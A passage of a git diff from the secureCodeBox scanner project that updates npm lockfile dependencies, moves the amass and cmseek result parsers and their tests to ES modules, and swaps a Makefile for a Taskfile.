"optional": true }, + "node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "license": "MIT", + "optional": true + }, "node_modules/lru-cache": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", @@ -466,28 +601,6 @@ "node": ">=10" } }, - "node_modules/make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dependencies": { - "semver": "^6.0.0" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/make-dir/node_modules/semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "bin": { - "semver": "bin/semver.js" - } - }, "node_modules/make-fetch-happen": { "version": "9.1.0", "resolved": "https://registry.npmjs.org/make-fetch-happen/-/make-fetch-happen-9.1.0.tgz", @@ -515,10 +628,23 @@ "node": ">= 10" } }, + "node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/minimatch": { "version": "3.1.2", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "optional": true, "dependencies": { "brace-expansion": "^1.1.7" }, @@ -526,6 +652,15 @@ "node": "*" } }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, "node_modules/minipass": { "version": "3.3.6", "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", @@ -625,10 +760,23 @@ "node": ">=10" } }, + "node_modules/mkdirp-classic": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/mkdirp-classic/-/mkdirp-classic-0.5.3.tgz", + "integrity": "sha512-gKLcREMhtuZRwRAfqP3RFW+TK4JqApVBtOIftVgjuABpAtpxhPGaDcfvbhNvD0B8iD1oUr/txX35NjcaY6Ns/A==", + "license": "MIT" + }, "node_modules/ms": { "version": "2.1.2", "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==" + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "optional": true + }, + "node_modules/napi-build-utils": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/napi-build-utils/-/napi-build-utils-2.0.0.tgz", + "integrity": "sha512-GEbrYkbfF7MoNaoh2iGG84Mnf/WZfB0GdGEsM8wz7Expx/LlWf5U8t9nvJKXSp3qr5IsEbK04cBGhol/KwOsWA==", + "license": "MIT" }, "node_modules/negotiator": { "version": "0.6.3", @@ -639,30 +787,24 @@ "node": ">= 0.6" } }, - "node_modules/node-addon-api": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/node-addon-api/-/node-addon-api-4.3.0.tgz", - "integrity": "sha512-73sE9+3UaLYYFmDsFZnqCInzPyh3MqIwZO9cw58yIqAZhONrrabrYyYe3TuIqtIiOuTXVhsGau8hcrhhwSsDIQ==" - }, - "node_modules/node-fetch": { - "version": "2.6.12", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.12.tgz", - "integrity": "sha512-C/fGU2E8ToujUivIO0H+tpQ6HWo4eEmchoPIoXtxCrVghxdKq+QOHqEZW7tuP3KlV3bC8FRMO5nMCC7Zm1VP6g==", + "node_modules/node-abi": { + "version": "3.75.0", + "resolved": "https://registry.npmjs.org/node-abi/-/node-abi-3.75.0.tgz", + "integrity": "sha512-OhYaY5sDsIka7H7AtijtI9jwGYLyl29eQn/W623DiN/MIv5sUqc4g7BIDThX+gb7di9f6xK02nkp8sdfFWZLTg==", + "license": "MIT", "dependencies": { - "whatwg-url": "^5.0.0" + "semver": "^7.3.5" }, "engines": { - "node": "4.x || >=6.0.0" - }, - "peerDependencies": { - "encoding": "^0.1.0" - }, - "peerDependenciesMeta": { - "encoding": { - "optional": true - } + "node": ">=10" } }, + "node_modules/node-addon-api": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/node-addon-api/-/node-addon-api-7.1.1.tgz", + "integrity": "sha512-5m3bsyrjFWE1xf7nz7YXdN4udnVtXK6/Yfgn5qnahL6bCkf2yKt4k3nuTKAtT4r3IG8JNR2ncsIMdZuAzJjHQQ==", + "license": "MIT" + }, "node_modules/node-gyp": { "version": "8.4.1", "resolved": "https://registry.npmjs.org/node-gyp/-/node-gyp-8.4.1.tgz", @@ -738,6 +880,7 @@ "version": "5.0.0", "resolved": "https://registry.npmjs.org/nopt/-/nopt-5.0.0.tgz", "integrity": "sha512-Tbj67rffqceeLpcRXrT7vKAN8CwfPeIBgM7E6iBkmKLV7bEMwpGgYLGv0jACUsECaa/vuxP0IjEont6umdMgtQ==", + "optional": true, "dependencies": { "abbrev": "1" }, @@ -748,25 +891,6 @@ "node": ">=6" } }, - "node_modules/npmlog": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-5.0.1.tgz", - "integrity": "sha512-AqZtDUWOMKs1G/8lwylVjrdYgqA4d9nu8hc+0gzRxlDb1I10+FHBGMXs6aiQHFdCUUlqH99MUMuLfzWDNDtfxw==", - "dependencies": { - "are-we-there-yet": "^2.0.0", - "console-control-strings": "^1.1.0", - "gauge": "^3.0.0", - "set-blocking": "^2.0.0" - } - }, - "node_modules/object-assign": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", - "integrity": "sha512-rJgTQnkUnH1sFw8yT6VSU3zD3sWmu6sZhIseY8VX+GRu3P6F7Fu+JNDoXfklElbLJSnc3FUQHVe4cU5hj+BcUg==", - "engines": { - "node": ">=0.10.0" - } - }, "node_modules/once": { "version": "1.4.0", "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", @@ -794,10 +918,37 @@ "version": "1.0.1", "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", + "optional": true, "engines": { "node": ">=0.10.0" } }, + "node_modules/prebuild-install": { + "version": "7.1.3", + "resolved": "https://registry.npmjs.org/prebuild-install/-/prebuild-install-7.1.3.tgz", + "integrity": "sha512-8Mf2cbV7x1cXPUILADGI3wuhfqWvtiLA1iclTDbFRZkgRQS0NqsPZphna9V+HyTEadheuPmjaJMsbzKQFOzLug==", + "license": "MIT", + "dependencies": { + "detect-libc": "^2.0.0", + "expand-template": "^2.0.3", + "github-from-package": "0.0.0", + "minimist": "^1.2.3", + "mkdirp-classic": "^0.5.3", + "napi-build-utils": "^2.0.0", + "node-abi": "^3.3.0", + "pump": "^3.0.0", + "rc": "^1.2.7", + "simple-get": "^4.0.0", + "tar-fs": "^2.0.0", + "tunnel-agent": "^0.6.0" + }, + "bin": { + "prebuild-install": "bin.js" + }, + "engines": { + "node": ">=10" + } + }, "node_modules/promise-inflight": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/promise-inflight/-/promise-inflight-1.0.1.tgz", @@ -817,6 +968,31 @@ "node": ">=10" } }, + "node_modules/pump": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/pump/-/pump-3.0.3.tgz", + "integrity": "sha512-todwxLMY7/heScKmntwQG8CXVkWUOdYxIvY2s0VWAAMh/nd8SoYiRaKjlr7+iCs984f2P8zvrfWcDDYVb73NfA==", + "license": "MIT", + "dependencies": { + "end-of-stream": "^1.1.0", + "once": "^1.3.1" + } + }, + "node_modules/rc": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/rc/-/rc-1.2.8.tgz", + "integrity": "sha512-y3bGgqKj3QBdxLbLkomlohkvsA8gdAiUQlSBJnBhfn+BPxg4bc62d8TcBW15wavDfgexCgccckhcZvywyQYPOw==", + "license": "(BSD-2-Clause OR MIT OR Apache-2.0)", + "dependencies": { + "deep-extend": "^0.6.0", + "ini": "~1.3.0", + "minimist": "^1.2.0", + "strip-json-comments": "~2.0.1" + }, + "bin": { + "rc": "cli.js" + } + }, "node_modules/readable-stream": { "version": "3.6.2", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", @@ -843,6 +1019,7 @@ "version": "3.0.2", "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", + "optional": true, "dependencies": { "glob": "^7.1.3" }, @@ -895,12 +1072,59 @@ "node_modules/set-blocking": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/set-blocking/-/set-blocking-2.0.0.tgz", - "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==" + "integrity": "sha512-KiKBS8AnWGEyLzofFfmvKwpdPzqiy16LvQfK3yv/fVH7Bj13/wl3JSR1J+rfgRE9q7xUJK4qvgS8raSOeLUehw==", + "optional": true }, "node_modules/signal-exit": { "version": "3.0.7", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==" + "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", + "optional": true + }, + "node_modules/simple-concat": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/simple-concat/-/simple-concat-1.0.1.tgz", + "integrity": "sha512-cSFtAPtRhljv69IK0hTVZQ+OfE9nePi/rtJmw5UjHeVyVroEqJXP1sFztKUy1qU+xvz3u/sfYJLa947b7nAN2Q==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT" + }, + "node_modules/simple-get": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/simple-get/-/simple-get-4.0.1.tgz", + "integrity": "sha512-brv7p5WgH0jmQJr1ZDDfKDOSeWWg+OVypG99A/5vYGPqJ6pxiaHLy8nxtFjBA7oMa01ebA9gfh1uMCFqOuXxvA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "license": "MIT", + "dependencies": { + "decompress-response": "^6.0.0", + "once": "^1.3.1", + "simple-concat": "^1.0.0" + } }, "node_modules/smart-buffer": { "version": "4.2.0", @@ -913,16 +1137,17 @@ } }, "node_modules/socks": { - "version": "2.7.1", - "resolved": "https://registry.npmjs.org/socks/-/socks-2.7.1.tgz", - "integrity": "sha512-7maUZy1N7uo6+WVEX6psASxtNlKaNVMlGQKkG/63nEDdLOWNbiUMoLK7X4uYoLhQstau72mLgfEWcXcwsaHbYQ==", + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.5.tgz", + "integrity": "sha512-iF+tNDQla22geJdTyJB1wM/qrX9DMRwWrciEPwWLPRWAUEM8sQiyxgckLxWT1f7+9VabJS0jTGGr4QgBuvi6Ww==", + "license": "MIT", "optional": true, "dependencies": { - "ip": "^2.0.0", + "ip-address": "^9.0.5", "smart-buffer": "^4.2.0" }, "engines": { - "node": ">= 10.13.0", + "node": ">= 10.0.0", "npm": ">= 3.0.0" } }, @@ -940,14 +1165,23 @@ "node": ">= 10" } }, + "node_modules/sprintf-js": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.1.3.tgz", + "integrity": "sha512-Oo+0REFV59/rz3gfJNKQiBlwfHaSESl1pcGyABQsnnIfWOFt6JNj5gCog2U6MLZ//IGYD+nA8nI+mTShREReaA==", + "license": "BSD-3-Clause", + "optional": true + }, "node_modules/sqlite3": { - "version": "5.1.6", - "resolved": "https://registry.npmjs.org/sqlite3/-/sqlite3-5.1.6.tgz", - "integrity": "sha512-olYkWoKFVNSSSQNvxVUfjiVbz3YtBwTJj+mfV5zpHmqW3sELx2Cf4QCdirMelhM5Zh+KDVaKgQHqCxrqiWHybw==", + "version": "5.1.7", + "resolved": "https://registry.npmjs.org/sqlite3/-/sqlite3-5.1.7.tgz", + "integrity": "sha512-GGIyOiFaG+TUra3JIfkI/zGP8yZYLPQ0pl1bH+ODjiX57sPhrLU5sQJn1y9bDKZUFYkX1crlrPfSYt0BKKdkog==", "hasInstallScript": true, + "license": "BSD-3-Clause", "dependencies": { - "@mapbox/node-pre-gyp": "^1.0.0", - "node-addon-api": "^4.2.0", + "bindings": "^1.5.0", + "node-addon-api": "^7.0.0", + "prebuild-install": "^7.1.1", "tar": "^6.1.11" }, "optionalDependencies": { @@ -986,6 +1220,7 @@ "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "optional": true, "dependencies": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", @@ -999,6 +1234,7 @@ "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "optional": true, "dependencies": { "ansi-regex": "^5.0.1" }, @@ -1006,6 +1242,15 @@ "node": ">=8" } }, + "node_modules/strip-json-comments": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-2.0.1.tgz", + "integrity": "sha512-4gB8na07fecVVkOI6Rs4e7T6NOTki5EmL7TUduTs6bu3EdnSycntVJ4re8kgZA+wx9IueI2Y11bfbgwtzuE0KQ==", + "license": "MIT", + "engines": { + "node": ">=0.10.0" + } + }, "node_modules/tar": { "version": "6.2.1", "resolved": "https://registry.npmjs.org/tar/-/tar-6.2.1.tgz", @@ -1022,6 +1267,40 @@ "node": ">=10" } }, + "node_modules/tar-fs": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/tar-fs/-/tar-fs-2.1.3.tgz", + "integrity": "sha512-090nwYJDmlhwFwEW3QQl+vaNnxsO2yVsd45eTKRBzSzu+hlb1w2K9inVq5b0ngXuLVqQ4ApvsUHHnu/zQNkWAg==", + "license": "MIT", + "dependencies": { + "chownr": "^1.1.1", + "mkdirp-classic": "^0.5.2", + "pump": "^3.0.0", + "tar-stream": "^2.1.4" + } + }, + "node_modules/tar-fs/node_modules/chownr": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.4.tgz", + "integrity": "sha512-jJ0bqzaylmJtVnNgzTeSOs8DPavpbYgEr/b0YL8/2GO3xJEhInFmhKMUnEJQjZumK7KXGFhUy89PrsJWlakBVg==", + "license": "ISC" + }, + "node_modules/tar-stream": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/tar-stream/-/tar-stream-2.2.0.tgz", + "integrity": "sha512-ujeqbceABgwMZxEJnk2HDY2DlnUZ+9oEcb1KzTVfYHio0UE6dG71n60d8D2I4qNvleWrrXpmjpt7vZeF1LnMZQ==", + "license": "MIT", + "dependencies": { + "bl": "^4.0.3", + "end-of-stream": "^1.4.1", + "fs-constants": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^3.1.1" + }, + "engines": { + "node": ">=6" + } + }, "node_modules/tar/node_modules/minipass": { "version": "5.0.0", "resolved": "https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", @@ -1030,10 +1309,17 @@ "node": ">=8" } }, - "node_modules/tr46": { - "version": "0.0.3", - "resolved": "https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz", - "integrity": "sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw==" + "node_modules/tunnel-agent": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", + "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", + "license": "Apache-2.0", + "dependencies": { + "safe-buffer": "^5.0.1" + }, + "engines": { + "node": "*" + } }, "node_modules/unique-filename": { "version": "1.1.1", @@ -1058,20 +1344,6 @@ "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, - "node_modules/webidl-conversions": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", - "integrity": "sha512-2JAn3z8AR6rjK8Sm8orRC0h/bcl/DqL7tRPdGZ4I1CjdF+EaMLmYxBHyXuKL849eucPFhvBoxMsflfOb8kxaeQ==" - }, - "node_modules/whatwg-url": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/whatwg-url/-/whatwg-url-5.0.0.tgz", - "integrity": "sha512-saE57nupxk6v3HY35+jzBwYa0rKSy0XR8JSxZPwgLr7ys0IBzhGviA1/TUGJLmSVqs8pb9AnvICXEuOHLprYTw==", - "dependencies": { - "tr46": "~0.0.3", - "webidl-conversions": "^3.0.0" - } - }, "node_modules/which": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", @@ -1091,6 +1363,7 @@ "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", + "optional": true, "dependencies": { "string-width": "^1.0.2 || 2 || 3 || 4" } diff --git a/scanners/amass/parser/package.json b/scanners/amass/parser/package.json index 9c48601b9f..45c118406f 100644 --- a/scanners/amass/parser/package.json +++ b/scanners/amass/parser/package.json @@ -8,9 +8,7 @@ "author": "iteratec GmbH", "license": "Apache-2.0", "dependencies": { - "sqlite3": "^5.1.6" + "sqlite3": "^5.1.7" }, "devDependencies": {} - } - - +} \ No newline at end of file diff --git a/scanners/amass/parser/parser.js b/scanners/amass/parser/parser.js index b248ccb05d..f60164d0aa 100644 --- a/scanners/amass/parser/parser.js +++ b/scanners/amass/parser/parser.js @@ -2,10 +2,10 @@ // // SPDX-License-Identifier: Apache-2.0 -const sqlite3 = require("sqlite3").verbose(); -const fs = require("node:fs/promises"); -const path = require("node:path"); -const os = require("node:os"); +import sqlite from "sqlite3"; +import { writeFile } from "node:fs/promises"; +import { join } from "node:path"; +import { tmpdir } from "node:os"; async function checkIfTableExists(db) { const query = `select count(*) from sqlite_master m where m.name="assets" OR m.name="relations"`; @@ -26,20 +26,20 @@ function queryAll(db, query) { } async function openDatabase(fileContent) { - const tempFilePath = path.join(os.tmpdir(), "temp-sqlite" + ".sqlite"); + const tempFilePath = join(tmpdir(), "temp-sqlite" + ".sqlite"); // Write the content to a temporary file - await fs.writeFile(tempFilePath, fileContent); + await writeFile(tempFilePath, fileContent); return await new Promise((resolve, reject) => { - const db = new sqlite3.Database( + const db = new sqlite.Database( tempFilePath, - sqlite3.OPEN_READONLY, + sqlite.OPEN_READONLY, (err) => { if (err) { reject(err.message); return; } - } + }, ); resolve(db); }); @@ -56,7 +56,7 @@ function closeDatabase(db) { }); } -async function parse(fileContent) { +export async function parse(fileContent) { const db = await openDatabase(fileContent); const tableExists = await checkIfTableExists(db); if (!tableExists) return []; @@ -128,5 +128,3 @@ async function parse(fileContent) { }; }); } - -module.exports.parse = parse; diff --git a/scanners/amass/parser/parser.test.js b/scanners/amass/parser/parser.test.js index d8af5b4119..cfc3e5d02b 100644 --- a/scanners/amass/parser/parser.test.js +++ b/scanners/amass/parser/parser.test.js @@ -2,17 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const {readFile} = require("node:fs/promises"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const {parse} = require("./parser"); - -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { parse } from "./parser"; test("parser parses example.com sqlite results database successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/example.com.sqlite" + import.meta.dirname + "/__testFiles__/example.com.sqlite", ); const findings = await parse(fileContent); @@ -22,7 +19,7 @@ test("parser parses example.com sqlite results database successfully", async () test("parser parses sqlite results database with empty tables successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/emptyTables.sqlite" + import.meta.dirname + "/__testFiles__/emptyTables.sqlite", ); const findings = await parse(fileContent); @@ -32,7 +29,7 @@ test("parser parses sqlite results database with empty tables successfully", asy test("parser parses sqlite results database with no tables successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/noTables.sqlite" + import.meta.dirname + "/__testFiles__/noTables.sqlite", ); const findings = await parse(fileContent); @@ -42,7 +39,7 @@ test("parser parses sqlite results database with no tables successfully", async test("parser parses sqlite results database with empty relations table successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/emptyRelations.sqlite" + import.meta.dirname + "/__testFiles__/emptyRelations.sqlite", ); const findings = await parse(fileContent); diff --git a/scanners/cmseek/Makefile b/scanners/cmseek/Makefile deleted file mode 100644 index d202a1075f..0000000000 --- a/scanners/cmseek/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = cmseek -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: | deploy-test-dep-old-joomla diff --git a/scanners/cmseek/Taskfile.yaml b/scanners/cmseek/Taskfile.yaml new file mode 100644 index 0000000000..eba6d685de --- /dev/null +++ b/scanners/cmseek/Taskfile.yaml @@ -0,0 +1,20 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3.44.0" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + excludes: + - predeploy + vars: + scannerName: cmseek + +tasks: + predeploy: + deps: + - demo-targets:deploy:old-joomla + cmds: [] diff --git a/scanners/cmseek/integration-tests/cmseek.test.js b/scanners/cmseek/integration-tests/cmseek.test.js index 7e26f54f47..e56b2dbf21 100644 --- a/scanners/cmseek/integration-tests/cmseek.test.js +++ b/scanners/cmseek/integration-tests/cmseek.test.js @@ -2,18 +2,16 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); +import { scan } from "../../../tests/integration/helpers.js"; -jest.retryTimes(3); - -test( +test.skip( "cmseek scans old-joomla for vulnerabilities without redirection", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "cmseek-old-joomla", "cmseek", ["-u", "old-joomla.demo-targets.svc", "--no-redirect"], - 90 + 90, ); expect(count).toBe(3); @@ -30,17 +28,19 @@ test( } `); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + }, ); -test( +test.skip( "cmseek scans old-joomla for vulnerabilities with redirection", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "cmseek-old-joomla", "cmseek", ["-u", "old-joomla.demo-targets.svc", "--follow-redirect"], - 90 + 90, ); expect(count).toBe(1); @@ -55,15 +55,21 @@ test( } `); }, - 3 * 60 * 1000 + { + timeout: 3 * 60 * 1000, + }, ); test( "Invalid argument should be marked as errored", async () => { await expect( - scan("cmseek-invalidArg", "cmseek", ["--invalidArg", "example.com"], 90) - ).rejects.toThrow("HTTP request failed"); + scan("cmseek-invalid-arg", "cmseek", ["--invalidArg", "example.com"], 90), + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); + }, + { + timeout: 3 * 60 * 1000, }, - 3 * 60 * 1000 ); diff --git a/scanners/cmseek/parser/parser.js b/scanners/cmseek/parser/parser.js index 3c9fe3c98d..efc01ae239 100644 --- a/scanners/cmseek/parser/parser.js +++ b/scanners/cmseek/parser/parser.js @@ -2,18 +2,18 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(findings) { - let results = [] +export async function parse(findings) { + let results = []; // Making sure the CMS is Joomla if (findings.cms_id != "joom") { - return results + return results; } // Check if debug mode is enabled ; if yes add finding - let parsed_debug_mode_enabled = [] + let parsed_debug_mode_enabled = []; - // I ran into an issue where the time coverted to ISO String was dependant from the timezone of the machine running the test. + // I ran into an issue where the time coverted to ISO String was dependant from the timezone of the machine running the test. // This means that if GitHub Actions CI time and local time are different the test will fail. - // To fix this we need to enforce the timezone in the date string. + // To fix this we need to enforce the timezone in the date string. // cmseek uses the timezone of the machine running the scan, so it will be different machine to machine (or cloud service). // https://github.com/Tuhinshubhra/CMSeeK/blob/ce085fee1b5f48db7412911e399bb2c771e73a0f/cmseekdb/basic.py#L296 // For simplicity UTC time is enforced, and that is by adding a Z to the end of the date string. @@ -27,11 +27,11 @@ async function parse(findings) { location: findings.url, osi_layer: "APPLICATION", severity: "MEDIUM", - } + }; } // Check if backup files are open; if yes add finding - let parsed_backupFiles = [] + let parsed_backupFiles = []; if ("joomla_backup_files" in findings) { parsed_backupFiles = { name: "Backup files", @@ -42,36 +42,40 @@ async function parse(findings) { osi_layer: "APPLICATION", severity: "INFORMATIONAL", attributes: { - joomla_backup_files: findings.joomla_backup_files - } - } + joomla_backup_files: findings.joomla_backup_files, + }, + }; } // Check if any core vulnerabilities exist; if yes list findings - let parsed_vulnerabilities = [] + let parsed_vulnerabilities = []; if (findings.vulnerabilities_count > 0) { - parsed_vulnerabilities = findings.vulnerabilities.map(vuln => { + parsed_vulnerabilities = findings.vulnerabilities.map((vuln) => { // Fetch CVE from vulnerability references const cve = fetchCVE(vuln.references); const separator = " : "; - + // Create CVE reference object if CVE exists - const cve_reference = cve ? [ - { type: "CVE", value: cve }, - { type: "URL", value: `https://www.cve.org/CVERecord?id=${cve}` } - ] : []; // Empty array if no CVE exists - + const cve_reference = cve + ? [ + { type: "CVE", value: cve }, + { type: "URL", value: `https://www.cve.org/CVERecord?id=${cve}` }, + ] + : []; // Empty array if no CVE exists + // Create URL reference objects from the vulnerability references const urls_references = vuln.references - .filter(ref => ref.includes("http")) - .map(ref => ({ + .filter((ref) => ref.includes("http")) + .map((ref) => ({ type: "URL", // Extract the URL if the reference includes the separator, otherwise use the whole reference - value: ref.includes(separator) ? ref.split(separator)[1].trim() : ref + value: ref.includes(separator) ? ref.split(separator)[1].trim() : ref, })); - + // Combine URL and CVE references, and filter out any empty reference - const references = [...urls_references, ...cve_reference].filter(r => r); - + const references = [...urls_references, ...cve_reference].filter( + (r) => r, + ); + // Return the parsed vulnerability object return { name: vuln.name, @@ -84,13 +88,15 @@ async function parse(findings) { references: references.length > 0 ? references : null, attributes: { joomla_version: findings.joomla_version, - references: vuln.references - } + references: vuln.references, + }, }; }); - } + } // concat all parsed results - return parsed_vulnerabilities.concat(parsed_backupFiles).concat(parsed_debug_mode_enabled) + return parsed_vulnerabilities + .concat(parsed_backupFiles) + .concat(parsed_debug_mode_enabled); } // Helper function to fetch CVE from references // it is assumed that the reference is in the format "CVE : 